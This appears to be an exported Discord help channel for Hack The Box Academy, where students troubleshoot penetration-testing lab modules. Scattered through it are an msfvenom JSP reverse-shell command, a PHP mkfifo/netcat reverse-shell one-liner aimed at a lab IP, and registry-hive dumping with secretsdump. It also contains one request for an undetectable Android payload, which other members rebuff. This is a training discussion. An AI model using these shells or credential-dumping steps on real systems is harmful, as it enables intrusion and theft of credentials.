#modules

anyway

did you check the question in forum and here?

yeah

i found the solution, it is easy, it is just the enumeration i try to optimize

Most subdirs if the top level dir is writable are gonna be writable

nope the top dirs are READ

just one from the 12 is wrtie

Ah

and we are back to my question 😉

Also I think you can use smbmap with -c to do a command

If command fail >> no write

yeah there is some ways to do it since we did but i was asking if there was a tool who do it like smbmap with -r or -R

seems we need to go around the "problem"

it isnt a problem at first xD

i did with smbclient and -c like you said, and tried to write my file on a subdir

but that was weird there isnt an option for that in smbmap or smbclient

or i missed it

anyway thanks all for helping

Sir

I meant smbmap -c

Lol

and i meant i already solved it and i meant i search a tool that does it without scripting it because with -c you must script in bash to make it work

Lol

Command Execution:
  Options for executing commands on the specified host

  -x COMMAND            Execute a command ex. 'ipconfig /all'
  --mode CMDMODE        Set the execution method, wmi or psexec, default wmi

i give up lol

thanks for helping

how is that running responder smb relaying gves different hashes for just network-joined computer and domain-joined computer?

Local users and domain users are two different things.

so it is worth to run responder on every compromised machine in AD, or just difference is big between machine in domain, and out of domain?

A non-domain machine isn't going to have the same inter-network communication that would trip responder for domain accounts.

Really, you should just use responder always in any windows situation lol

cool, thanks

or inveigh, if you prefer

Has anyone done Working with IDS/IPS, specifically Snort Rule Development? I can't seem to get the correct syntax for the answer.

don't forget the ; at the end

hrmm

Does it need the square brackets

nope

Is it the full keyword?

Hello to all. I am a little stuck on the Blind XSS activity regarding the PHP listener I am using to listen back to the connection. The first version of this script was to gather credentials but now I need to gather info from multiple inputs fields such us URL image for avatar. username password e.t.c. While I have to change the location to listen to to the new page of the exercise do I have to add additional parameters for isset() and fputs to gather $_GET[' e.g. URL Image parameter name '] to get these values also?

Ah! Got it!

Thanks @autumn pilot!

Anyone know why I can't send images to this discord?

read #welcome

something is definetly wrong because i tried with the next module (windows) and the passwords i get are not the answer

You should delete that screenshot, as it has spoilers. It looks like you got the password just fine.

i'm definetly not getting it 🤣 😅

i tried with three different anwser boxes and they dont accept them

Does anyone can help me with this PHP listener for multiple inputs?

what module and section are you having issue with?

try with either /tls-seclevel:0 or /timeout:80000 or both

@vital adder LLMNR/NBT-NS Poisoning - from Linux from Active driectory enumeration

Someone deleted my msg with all the details 😅

most likely because it's contain spoiler

also what's the issue? this section straightforward

I understand but when i input the answer they dont work, I can send images in private if needed

which module and section are you on?

If I recall the question says the account name starts with a b submit his full username

I am on XSS vulnerability in the Session Hijacking and trying to implement a blind XSS with a PHP listener

I have the username

oh so you got the cred but it didn't get accept as the answer? and sure shoot me a dm with the cred

alright, Mrtom to the rescue 😉

Will do thanks

hint everything you need for that is in the examples and the main thing is you have to host ||2|| file

walkthrough and write isn't allow for that module

I dont need to change the PHP script to get more than username and password inputs?

@vital adder ive been having some trouble w a metasploit module, do you mind seeing if im on the right track if i send you the scans and the exploit im using?

but will if you need some help feel free to shoot me a dm but i'm kinda full right now so you may have to wait a bit 🤣

sure

haha thats ok, i appreciate it

ill try make it as quick as pos

sure and same as the others feel free to shoot me a dm if you need help

just to double check you are on the Session Hijacking section of the XSS module right? if so then yep

I keep getting the following error when trying to use chisel on the pivot host in the module "Pivoting, Tunneling, AND Port Forwarding" section "SOCKS5 Tunneling with Chisel" I used a different version of chisel as stated to do in the section when you receive an error . ubuntu@WEB01:~/chisel-1.7.3$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel)

if you are using the arm version then just use the amd version

Thank you!

i was rewriting and figured out i had changed an option that messed everything up, so its all working now :))))

Hey everyone, can someone help me with the Modul footprinting - Lab Hard. I’ve managed to get the private key for the user, changed permissions for the ssh key and tryed to log in but it won’t establish a connection .. I’ve tried manythings (switching to root user etc.) doesn’t seem to work , does anyone know what to do?

Hello im in module AD Enumeration & Attacks - Skills Assessment Part II in question 11 (Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.), please could somebody help me ?

for someone to be able to help you, you kinda have to say what you need help with 🤣

Im trying to log in DC01 but credentials doesnt work!!

but i have help enough people to kinda guess what you are having issue with and hint go back to question 9

hint you can't

also it's an AD attack not a PrivEsc so why is logging in your first and (maybe) only choice?

so you have the cred, key and user but you still can't login?

yes

i have this issue

see it and i delete it because are credentials

yea that's intended

you don't need to login into the DC for this attack

mmmm

like i said it's isn't a PrivEsc and the hint i give go back to "question" 9 (not the answer)

i try one think

why this doesnt work?

you first have to load it in memory

the module

use .\powerview.ps1

or -s i think

i load it

im trying to solve this f**cking module but i cant

i use this Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Right…

shoot me a dm with key that you have and if that's wrong i'll send you the one that work for me

if you need a other hint then you have a user that's in the ||DA|| pwning the DC should be straight forward

Did you get the badge now?
It should be possible to get the badge now.

not yet, lol

@acoustic owl

You were just too fast lol

Support can probably help you.

I am the 0.00%

me too

the girl doesn't like it (too fast)

Hey guys me and my friend gonna make it automattic bot in krunker.io that claim free kr on specific map so if anyone wanna join DM me also we gonna split the kr we make

hello everyone
the live engagment is kicking my butt
in the shells & payload section
don't chat in here much so i can't even uplaod pics
i used this paload to get a reverse shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.11 LPORT=8080 -f war -o revshell.war
but when i deploy it and active my listener nc -lvnp 8080 i get nothing

Do you also click the link after deploying?

hello everyone i have a little question what is the diference between wmiexec and psexec and where i have to use they and what ports use?

i did click on the link which opened up another page but i got no error

https://medium.com/@allypetitt/windows-remoting-difference-between-psexec-wmiexec-atexec-exec-bf7d1edb5986

I'm a little bit stuck on Password Attacks -Hard assessment. I've got as far as getting the vhd and running it through john and gotten a password, but when I try to mount it (following this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 mentioned previously in this chat), then when I try to open the 'Device' and enter the password it says "Password Incorrect".
Any Idea where I went wrong?

read #welcome and #rules after that use /verify at #bot-commands and after you verify your account you can send screenshot

also pls ask better question some thing like what's the issue, what did you try and what didn't work

ooohh this is what i need thanks

this channel is for HTB academy so don't share sh!t like this or you will get the 👢 from one of the mod

#modules message

if you have some issue flowinging that let me know

Hi im stuck at Introduction to bash scripting and im kinda confused what i should try next could someone help me?

ok verifed now

hi there, i dm you my decoded shellcodes

and what's the issue?

revshell upload

what target are you on and did you try to run the shell?

i went to webpage

how do i run the shell ? i though once i hit deploy that would be running the shell

<@&861185840277487616>

the issue is you are using the wrong ip

use 172.16.1.5 instead

will do, how would i konw to use that ip ?

it's the ip of the given box 🤣

not true

i mean the internal ip of the foodhold machine

indeed

thanks for your help kind squirrel

lol i will need more help in this section

Thanks for the assist, I got it open

my next issue is

i can't downlaod the exploit for

its in the /etc/hosts file

can anybody help how to mount vhd file in linux

That foothold box is not connected to the internet afaik

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

hint that exploit is somewhere in the foothold box

im doing the vullnerability assessment module. With openvas what the vulnerabilitys are called is not appeaering

roger that, i'm looking now

i get a long as string like 1.3.6.1.4.1.25623.1.0.900600, not what the vuln is called

buffer-overflow modules are now tier 0?

which makes it so I cant anser the questions of what vuln its describing

Yes, I had issues mounting the vhd too but that link worked for me

i believe i found it

Thanks for all the assistance with Password Attacks. Just finished the module

NVM to my issue, I litearlly changed nothing and it fixed itself randomly

how do i drop that payload into msfconsole? i'm having issues doing so

By listenning the same ip and port that you set for the payload

could you give me an example of the command ?

Bro..better you refer vedios

On youtube

For msf..there is clear solution

if you mean import the exploit module into metasploit then i don't have anything on the top of my head right now so google is your best friend also the key is after importing the exploit run reload_all before you can use it

I have a question friends...

If i pay for an annual vip+ of $200plus

Then i can able to get access for pro lab or not ?

Pro labs are a separate subscription

pro labs aren't even from the academy

first if you are new here read #welcome and #rules after that use /verify at #bot-commands and are you in the academy channel so if you mean the Silver Annual then nope the academy doesn't have anything to do with the main platform and if you mean the VIP+ on HTB then still nope but now "all" prolab is $49

academy just covers the modules and with silver sub I think u have 1 attempt for the exam

Mood

and in the main platform there is a sub for the machines and other one for the pro labs

1 voucher

Which is still the 2 attempts

How do I 'impersonate' a user with 'sqlcmd'?

the exploit should be in metasploit

but doesn't show up

put it in /home/htb-student/.msf4/modules/

I believe attacking common services shows how

Mssqlclient and sqlcmd are relatively the same thing

1 question

BOF modules weren't tier 0 before right?

I was blind and I just saw I can buy them for 10 cubes

@fathom pendant Right ok thx I'll reread some things. Couldn't use mssqlclient because it was lagging to much on the pwnbox, now doing sqlcmd from rdp

Ye but I believe the section goes over checking impersonate privs and how to

So it should be good

I think these modules have always been Tier 0.

i did that and did a msfupdate in msdfconsole

waiting for it to load and hopefully payload is available now

Just completed the final 'hard' lab of the Attacking Common Services skills assessment. If anyone needs help on that module or any before it go ahead and ask me and I'll try to give you a hint.

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 171.16.1.5 8443 >/tmp/f"); ?> i uploaded this command and i'm listening on port 8443 and got no connection any idea why ?

Try accessing the url of the .php file you uploaded @high reef

got this error

not .aspx, you wrote your shell in php originally right? Should be .php

unless php is not running on that server

Woops youll have to upload an aspx shell @high reef My mistake I should have just told you that. Normally you don't see php AND aspx running on the same server.

The source of the issue is the expired DomainControllerAuthentication and KerberosAuthentication certificates on the domain controller. They expired on March 30, 2023. Another fun exercise is rooting the DC, updating the certs, then proceeding with the PetitPotam exploit. I've posted the issue in #858470491676737536 but it will require someone go update the image.

Very nice to share this info, I will definitely try it

i have a shell but i can't travel any where

do you have a reverse shell i can use nc with ?

https://www.revshells.com/

thanks

Hello i have a question about a Anatomy of a Shell the question is "Which two shell languages did we experiment with in this section? (Format: shellname&shellname)" so my answer is ||powershell&bash|| but i still get an incorrect answer is it because im typing it in the wrong format.

did you try it the other way around?

Lol it worked 😄 Thanks

For future reference, you can't cd anywhere from inside a simple webshell because it's just executing single commands from the directory that it is placed in.

~~Question regarding Footprinting Lab - Medium ~~

Resolved!

evil-winrm doesnt use RDP

Oh. That makes sense. I'm dumb as hell, hahaha. This is exactly why I should coffee before trying to use my brain.

happens

Ended up using Remmina but curious if anyone would suggest any other RDP tools?

INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.
I did the next things: PowerShell -> Get-Process | Where-Object { $_.Name -like "vm" }

Results: vmtoolsd (which is wrong) and vm3dservice (which is also wrong)

Anyone a hint what i did do wrong?

evil-winrm is for winrm

for rdp u can use xfreerdp or whatever tool u want to use

Imo remmina is the best, especially the scaling options

Thanks for the feedback.

madf0x beat you to it 😛

Thank you though!

reminna xfreerdp vinagre

Hey all, I have a question about the Attacking Common Services - Easy section.|| I got a set of creds and was able to find the upload portal on the site, as well as it's path on the host, but am not sure how to leverage this. I know that uploading a shell is the way to go, but I can't find where the file goes. || Any help is appreciated

Found it. Forgot .exe

The application you're attacking is open source, the file structure is well known

I'll open a PR to increase the stats decimal places you were part of the 0.0001%

@proud pine you can post this as Linkedin status now
Top 0.0001%

I mean, he wouldn't be lying

INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Task 10 (last one) What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

All the info i got from the log files are incorrect. Should i connect to another machine (DC) first?

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack?

can anyone help me with this Ques :

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

Ive tried nslookup and dig tools
cant find the FQDN on the output...am I missing something?

The question is posed in a somewhat confusing manner. You are looking for the FQDN of the NameServer

Just wondering what I am possibly doing wrong. I trying to do the quiz for Attcking Common Services - FTP but I just cant see the FTP port. I'm using sudo nmap -p- -sV -sC <IP> but the only open services that I get back is ssh DNS and SMB

when I scan specifically for FTP like its stated in the section -p 21 I can see 21/tcp closed ftp

Hey guys I'm a newbie in the academy and don't understand if I where to finish a certain amount of modules am I going to have a chance to be recruited in the HTB organization?

Earlier they were quite clear about connecting to the DC, now i guess i use the same creds as earlier with the user?

@nimble fractal i am using "sudo responder -I tun0" for the resonder, anything wrong here?

You can take the same creds as you have worked out for this task

Thanks, found it.

Try restarting the box and giving it a minute or two before scanning, could just be an error with spawning it

Anyone done Introduction to C#? I'm having a problem getting VS Code to import the library from the Assessment.

Stuck with the same task 🙈

Its my final question 😄

Were you able to include the DLL in the Libraries section?

module : attacking sql databases
i have logged in with the given creds, trying to do hash stealing but getting this errors. any help is appreciated

I'll take care of it tomorrow.

Yeah, but I did it on my windows machine.

My secret weapon

https://www.udemy.com/course/csharp-grundlagenkurs-fuer-anfaenger/learn/lecture/37314296?start=0#overview

hahaha

still borked

are you sure 10.10.14.255 is actually your tun0 ip address?

With VS Code or with Visual Studio Community?

@trail leaf yep

VS Code.

try to Scan all Ports 😉

That can't be right. X.X.X.255 is a broadcast address

@nimble fractal

your error tells you the problem

xp_subtree doesnt exist

Broadcast in this case is 10.10.15.255
10.10.14.1 - 10.10.15.254 are Hosts

and you dont have perms for xp_subdirs

This is only true if the subnet mask is a /24.

@thorn urchin found it thx for the help

np

I wish that gave a different result

You should have another port showing up there. Slightly higher

Restart the lab. One port is still missing

hello i need help with Attacking Common Services - easy

i heard its a cursed module

22 it’s the best port to go though my man

Its not.

Ye it is for a sever

The challenge is for FTP.

It gives full access doesn’t it

Oh

I did not read

My b

yep! /bonk

😂

What

Was

That

I don't know why you think the module could be cursed. If you tell what does not work, you will surely get help

Spammer got auto banned I think

Oh

Anyone know how to hide links

Cuz I use this

Give me a sec

currently struggling to even enumerate users

Take a close look at the NMAP scan.

Identify a port with the NMAP, and then use one of the tools that's discussed in the earlier chapters to enumerate users.

tried smtp-user-enum, also hydra for password spraying on ftp and rdp

How am I supposed to get the hashes from a NTDS.dit file I have? I tried to cat it and got the binaries xd

Are you using the provided user.list file?

I thought as much

Secretsdump.py

yeah

Added domain?

yeah

What commands are you trying? (obfuscate them)

did you tried updating the certs ? I am currently on it but am facing an RPC error when trying to enroll for new certs. did you managed to do it ?

i am, otherwise i wouldnt even see it

can i dm u?

you must provide path to every files (NTDS SYSTEM, SAM)

You need the SYSTEM and SAM from the registry

Sure.

if you read French : https://rebrec.github.io/rebsecnotes-public/_Techniques/Windows/Dump de credentials/Dump de la SAM/#sam
else basically you first need to gather thoses 3 files by running the following on the compromised host :

reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

then you download the 3 "save" files on your attack box and then run

secretsdump.py local -sam sam.save -security security.save -system system.save LOCAL

Technically, they only need the SYSTEM, as they've got the NTDS.dit

https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/

umm nevermind, just bumped on secretsdump and didn't read properly

😄

🙂

ok for some reason i found an user

Ah oke thx

It works

thanks

Because the connection in question wasnt being broadcasted across the network

ONLY being sent to that one box

also a ton of spoilers, should delete your message now

Nice, definitely above and beyond the scope the lab intends for ya, but imo thats where some of the best learning is done

even if in this case the motivation was to fix the lab

If we have a student HTB academy plan, the silver plan really only gives us the free voucher, yeah? pretty much the only thing you'd get from going to student to silver or am I missing something

thanks will try with certify this is weird that the enrollment agent is not able to get a new cert and certify can lol. I am wondering how certify get the certs it it using the web endpoint instead of RPC calls ?

damn the practice is really working 😄

I got this box solo in around 3 hours

4th time's the charm🍀 . FTP finely showed up

I can help u with certipy if u have any doubt

from windows ?

https://github.com/dirkjanm/PKINITtools u can use this to craft tickets and get the nthash with the cert

from kali

u are using windows as attacking box?

the goal is to install new certificates on the domain controller, even if this may be feasable with certipy, it would be more complex I guess

oh mb

I thought u wanted to get the certificate

🙂

not create and new one

The certs on the DC that allow that to work expired so we are discussing the process of updating the certs so that can be used as shown in the module.

oh okay

which module is it?

I would like to learn about that

AD Enumeration and Attacks - Bleeding Edge Vulnerabilities section.

they updated the module?

I don't remember doing anything about certificates in that module

@fathom pendant I'm stuck on the Footprinting Lab - Easy......... Can someone help assist me in this module? Once I log into the ftp sever with the creds provided, I can't seem to progress form there.

You didn't have to do that part (PetitPotam exploit) to answer the questions, it was optional.

it doesnt. theyre going beyond to solve why a part of it is broken

Id love an ADCS module though

oh okay

I kindly advise to not spoil the exercises, additionally to not push students into rabbitholes

Not spoilers when the whole exercise says "do what we did in the section"

I dont see how its spoiling an exercise. Its an optional section

I'm talking in general

I guess ¯_(ツ)_/¯

Wheee!

guyys

congrats

I've seen students falling into rabbitholes just because they have read x, y and z, without considering

From different users

2 more questions to go and I'll have finished every (current) module! 😄

Rabbit holes have the best knowledge gains

thats impressive

That's possible, but only if they can dig themselves out of the rabbit hole

@acoustic owl be fuming

i have a problem , how could shutdown redeemer machine in hack the box, i cannot connect whit the machine but i can stop thath machine

Not quite, especially when you don't know what you are doing

please

More like "Oh hey, someone I can ask for help!" 😄

they too have been aiming to clear every academy module

sorry

This is the channel for academy modules. Try #boxes

How was it ?

i have no acces

:c

read #rules and #welcome

Relatively easy up until the Skill Assessment, where it suddenly was a bit more complicated. But nothing too difficult. Hardest part was getting VS Codium to co-operate and get the wordlist out of the library.

and youll gain access

they have labs ? For this

I've been a little ahead for awhile. But I had this week off, so I was finishing off the last 5 modules. Just need to do Game Hacking.

Some basic questions for some of the modules, with a couple of labs. Final lab is importing a dll, and then using it to enumerate against a HTTP server to grab a flag.

Hello

What is the difference between HTB academy and try hack me?

Similar things

I've only done a little THM, but it felt a bit more walkthroughy

Nice! I've been waiting for this. Have been having some trouble locating quality zero to hero Offensive C#.

I've finally done it! Taken a year, but I've done it!!

Now to do some prolabs and boxes, lol

i only need to answer this one question to be done with shells and payloads

i'm stuck here, i go to website and find the clue to download the 50064.rb file

i upload it to msfconsole but i get this error message

i set the rhosts=172.16.1.12 set lhost=172.16.1.5 set username admin set password admin123!@#

i saw a clue on the forum about vhost its not needed to be set, but what would it be set to ?

insane bro

keep the grind

I am still at 48/83

Hey all, I'm having a issue in the Password attacks “Passwd, Shadow & Opasswd” module.|| I got the passwd and shadow file, unshadowed it, but now I'm running the command "hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked" and getting no results. Both the passord.list file and mut_password.list files exhausted the list, and rockyou.txt is going to take three hours. Is there anythiung else I can do, or do I just need to bite the bullet.|| Advice here or DMs would be appreciated.

Hi so about the Learning Process module, I've revisited it and was going through some of my notes and saw that "The Learning Pyramid" has some controversy behind it, this being more specifically directed at sections: Learning Efficiency and Learning Type.

||The controvesy being that NTL Institute the initial Research org that published "the learning pyramid" is currently unable to prove any of it's work due to quote "While we believe it to be accurate, we no longer have nor can we find the original research that supports the numbers." <- This was taken from The paper published by Kare Letrud "A Rebuttal of NTL Institute's Learning Pyramid".||

Anyone find any similar info in their research? Also I've tried searching for the original papers on "The Learning Pyramid" and have yet to stumble on anything.

Idk, I loosely follow the ultra learning principles. Never learned this Learning Pyramid

I wouldnt worry about it too much

either you have the passion and spark of curiosity that drives you to learning in this field or you dont

I can side with that, learning to discern info was part of the module's advice 😛

Set the vhost

hey guys. I can't find julio.txt https://academy.hackthebox.com/module/147/section/1657 Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

any hints? as to what I might be doing wrong? the last person who got stuck here didn't get an answer in the channel

got it

say what dayum! You done every single module?!

Yep! And that’s the plan!

thats a helluva achievement though congrats every sing module!

wrapped in spoiler and harmless as it is. Id delete before a mod a reads it

You figure this one out yet? I am stuck here also. I got all the subdomains, running dig to check records, and not finding anything. I see something with flags in records, but that is not it.

Can anyone help with the Footprinting Lab -Easy?

you guys all doing the attacking enterprise networks module at the very end blind? doable blind ?

Mostly blind

one little part im not sure how I would have done blind without simply knowing the trick of it beforehand

added to my notes ofc

That one part was totally not fair lol

ahh - that towards the end or start of it?

without giving anything away

youll find out

hehe alright indeed i will

Im still stuck on AD enumeration skills assessment question8 i must be overthinking this gahhh

What is your question?

#1 or #2?

#2

that was the one that got me for few minutes as well but then I read the hint

Im sitting as system on MSQL01 and tried all the things i can think of to get myself admin on MS01

ohh it was the next one that had me stumped not that one

just read the hint on that one, go back to the basics

something talked about in this module basics or previous modules?

the hint on the next one helps too, this one "Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?"

embrace the suffering, thats where you learn the most 😄 - go back to the basics of the module, the hint is a give away, good luck

I would also say, just start from scratch, do a full start to finish attack. I did both the AD exercises blind, only read the questions towards the end of #2 for the hint. So I had already mapped out the entire domain, users, groups, privs etc. If you're just answering the questions, maybe you haven't done full enumeration yet so do that

ahhh okay

@lyric bolt🍞

ive spent all day looking at different reasources, determining which module I should begin with

its... exciting to learn about all these different things

hopefully I can stay consistent in my learning

I dont know exactly what I want to achieve with htb

but ill do it regardless

Start with the infosec foundation path, it paves the groundwork for a lot of things

Im on the your interests screen on the account creation part

once I hit it, i realized I dont exactly know uhh

what intrests me

Honesty: this isn't important

alright

I also know a tiny bit of python if that adds any value

trying to get better in that regard

Todays lab was the Tom cat server.. I couldn’t figure it out. But eventually got it! I go out to party and Tom cat looking right at me

There's probably a few python courses and such but eh for the most part, unless you're creating your own tool, you rarely need to code your own things

Can anyone tell me the suggestion for undetectable payload and for autoinstallation

?

No

What module is this for

It's a personal qs

For my project

Wrong answer

Read the #rules and #welcome

All the times my playload got detect by firewall androi.

Uselesss🙄🙄🙄

Then that's just a skill issue. But it is wholly unrelated to this channel

Good bye

Good

🙄

Go fuck off now, if you don't know how to read rules

U too

I at least know what the rules are and what the purpose of this channel is

No u don't know

Hackthebox is totally related to learning

Not only modules

@obsidian crag don't want to destroy the fun but keep spamming unrelated stuff to this channel like that you will get the 👢from one of the mod

Okk🙄

Correct, just ask your questions in the appropriate place

COMMAND INJECTIONS - Advanced Command Obfuscation: How do I bypass the blacklist filter of the -n 1 part in the command "tail -n 1"?

Potentially url encoding?

Doesn't work

I can run tail but when I try to add the -n 1 part it cannot run

reread the section maybe ¯_(ツ)_/¯

I haven't done this. So I'm spitballing

hey

I'm new to this whole thing and am trying to sign up for the HTB thing, and I don't understand what exactly everything means in the "your interests" section means

could someone give me the rundown?

Ur right, I did miss something from the section

I mean it's kinda self explanatory, things that interest you

It's overall, not actually important

just user data stuff ¯_(ツ)_/¯

Yes, however, when I say I'm new to this whole thing, I mean I'm brand spanking new to this entire field, I don't understand what the words mean

Then you don't need to really select anything or just use google

wtf is a DevSecOps or a Cryptography

It forces you to choose 3+ items

Development Security Operations

Just honestly Google them or select arbitrarily

It really doesn't matter

I'm just going to choose all the ones that say Penetration testing because I'm childish and that sounds funny

¯_(ツ)_/¯

Like I said it doesn't matter

ok, cool

Congratulations 🎉

Because Wolfiej has completed all modules?
No, I am happy for him and admire this achievement.

I was just joshing around

what is function of -z

So Im having some problems with the introduction modules.

inlanefreight.com is not responding

yet the site works just fine

it checks if the passed argument is empty. ex:

#!/bin/bash

if [[ -z $1 ]]; then
  echo "No argument provided"
else
  echo "argument: $1"
fi

example;

if i run this

./program``` 
returns 'no argument provided'

```bash
./program hello```
returns ' argument: hello'

can anyone help me out here on to what's going on?

also, the emulators are slow to

@coarse escarp is this for the questions section Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'?

@coarse escarp You need to start the target and then connect to the given ip to access the website.

im looking for locations using post

oooh

but what is benifiet of double square brackets because when i am use square bracket the code is works

I see now

i need to spawn it in first

yea it would work, double is for enhanced conditional testing, ex. && and ||

if you would pass 2 arguments in single [ <x> ] it would return too many arguments + the normal result for example, in double [[ <x> ]] it would just return the normal result

https://www.baeldung.com/linux/bash-single-vs-double-brackets

what the fuuuu

wrong pic

lol

wtf happened here??

I just reset

maybe fullscreen mode would be usefull

ok so now I'm getting a syntax error around the port number

you should specify the port without <> around it

same for the ip

remove the < >

did that now I gotta add a new port number lol

no such file or directory...

@coarse escarp can you show the full command you have now?

\

you still have < and > at the ip address, remove those

but then why did the instructions say <IP_address>:<Portnumber>

that's just a placeholder

I'm semi new but come from a coding bacground

in a object bassed code that is used as a housing syntax

so I'm a little confused but will remember not to use those

oh wait..

I didn't add paramaters

1. you have a space before the port number it seems like, there should be no space after the :
2. not -x but -X

got it

Weeb!

😄

what is mean f this?

wait... that's the same pic

hold on

so it's saying I need a valid cookie but I copy and pasted the most recent one

with the correct port number

a condition is a set paramter that the code will run in

an if else command is an example of a condition

If the amount is above 50 dollars deny acces Else allow transaction

and a variable can be anything you set value to

it's a container of value

so for java a variable looks like {Bank amount = $~}

a for loop is a repeated action on till a condition is met

and it doesn't exactly need to be a repeated action either

it's a way of making the code flow

it's a different kind of jump condition

for each task is complete go back and repeat until a clause is met

a bit rusty so I had to double check some of my work

great...

because of my internet I lost my box

What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)

please someone answer

i have no paid subs.

if you mean the pwnbox then
Please note, free users are only able to spawn one Pwnbox instance per day. The Pwnbox instance has a lifetime of 120 minutes. Internet access is limited to our own targets, and GitHub. This limit can be lifted by making a purchase on Academy.

yeah ik just annoyed is all

What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)

I completed 83 modules, but I still have no the Hardware Hacking badge lol, it's missing, lol

Im sure they will fix it on Monday 🙂

so in the regular htb I'm having trouble with a build bash script

I'm litterally a few commands away from completeing this box

but it's not finding a supported release

good day friends, how to solve this?

Is there a file users.txt?
If yes, does your user have the right to overwrite this file?

no its anew one

its at AD Enumeration & Attacks - Skills Assessment Part II

Meow is a box from Starting Point. Try to get help there.
#starting-point

If you have no access, then read and follow #welcome

i see, you are in /opt, right?
Your user has no write permissions there.
Change to your user directory

oh i get it 😅 thanks a lot 😊

Doing HTTPs/TLS Attacks:Skills Assessment and have been stuck for couple of days, from what i understand it's oracle padding attack and error massage is "Decryption failed" not " Padding failed", therefor the decryption of htb-user cookie succeed, but getting admin user cookie seems to be missing an encryption and i tried adding base64 + hex {vise versa} encoding to admin cookie but no results

any help is well appreciated!!

Have you decoded the token?

I posted the issue there

would you mind seeing what's wrong?

I can help you with most of the modules in the Academy, but I don't have notes from Starting Point.
That's why I told you to ask your question in the right channel. There will be people there who can help you.

after i got what is supposedly the admin cookie and tied to redeem it /token but I get " Decryption Error. Invalid Token! "

ok

Send me a DM with the command you used.

and i have view the reposes in Burp, and most of the pages and buttons are static expect for /admin and /token, but i didn't see any token laying around for any user

ok

I am having trouble with this question('+ 5 What is the password history size of the domain? (How many passwords remembered.') from the section of this module(https://academy.hackthebox.com/module/22/section/290) and I think I have to look for the domainDNS with the search filter of the ldapsearch-ad command:

"python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -search-filter "domainDNS"

The command below didn't return the results I wanted. What else could I add to this command ?

how many threads u guys use with ffuf

to enumerate subdomains

Hey i'm on pivoting module in the SocksOverRDP section. I've uploaded the zip into the windows machine and extracted the files, but once i try to "load" the .dll file this error occurs

The file is detected as a virus and is deleted just after the command

Module: File Upload Attacks
Section: Final Assessement

I'm stuck, cant make any progress on this - can someone give me nudge? Open for a DM?

Deactivate Real Time Protection on this Machine first

Thanks, it worked

Try to get the PHP source code.

Module : Network Enumeration with NMAP
Section : Saving the result
Using VPN
Question : is this a networking issue or do I have to change my nmap parameters to do the requested scan ?
Thx

This is expected as you're doing a verbose output, it's telling you "hey this port we're trying ain't responding"

And because you're doing -p- it's checking all ports

Module: Network Enumeration with NMAP
Section: Firewall and IDS/IPS Evasion - Easy Lab
Question: i cant seem to find OS type everything i try gives me back "No exact OS matches for host"
Only thing i found was this but the answer is not Linux
Also i fond some write up that says i shoud use this but its not working (nmap --script smb-os-discovery 10.129.2.8)

How do i send pictures discord is not leting me

Well when you run Nmap it shows that a web service is running

You can reasonably assume the os based off that (it's the distro)

Verify your main htb account, the instructions are in #welcome

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel (i found this)

ty

Visit the webpage

Or perform it specifically targeting the web server

thx for your response.
I did --vv when I noticed it was taking such a long time. -p- is for full scan as requested in the exercize.
Why does it take such a long time for the scanning ? Do I need to work on my nmap parameters ? Is my nmap command correct for this exercice ? ...

There's 65535 ports, and depending on various factors, it can take a small bit of time to confirm if a port is closed or not.

Thx rat for answering. I do understand that the number of scanned port can make nmap taking a long time... but... i'm using HTBvm and I am surprised that this simple nmap command takes such a long time... It takes longer than my HTBVM life time 🤔 This is why i'm asking myself if I use the write parameters for this exercice ...

Try the scan with -sT instead

You're doing a syn scan meaning it's going to keep trying until max retries are met

Iirc you can hard set --max-retries

It's telling you that it's bumping up the retries because it's failing

I'm working through the Live Engagement of the Shells & Payloads modules and am on Task 3.

|| I'm attempting to use EternalBlue to exploit the machine, but it's failing. The server allows aspx uploads and I am able to access PowerShell with antak. I'm in a mental block where I'm not sure what I require to move forward. ||

Are you setting the LHOST to the right internal ip

@fathom pendant that was my inital fault 😄

Love that you asked this. The results from ifconfig give me several results and I'm conditioned to use tun0 (not present).

ifconfig for win!!

remember that you are in a foothold !!

I have prefixes docker, ens, and lo. My intuition says docker.

try other 😄

but you are in the good path

@misty mural Have you achieve the reverse?

No, the process fails after the exploit is executed on the target.

Wrong Server

The final output is "Triggering free of corrupted buffer" prior to failure.

task 3 you mean the host3?

Correct.

what service are you trying to exploit?

SMB via port 445.

I supose you are using metasploit ?

waht module?

windows/smb/ms17_010_eternalblue

@proud pine @fathom pendant thx for your help. I answered the module final question by doing a -Pn scan... but... I'm still wondering why -p- option takes so long time. I tested it on my own VB and same thing.... very long ....

sometimes some modules are better than others,depending on the host...

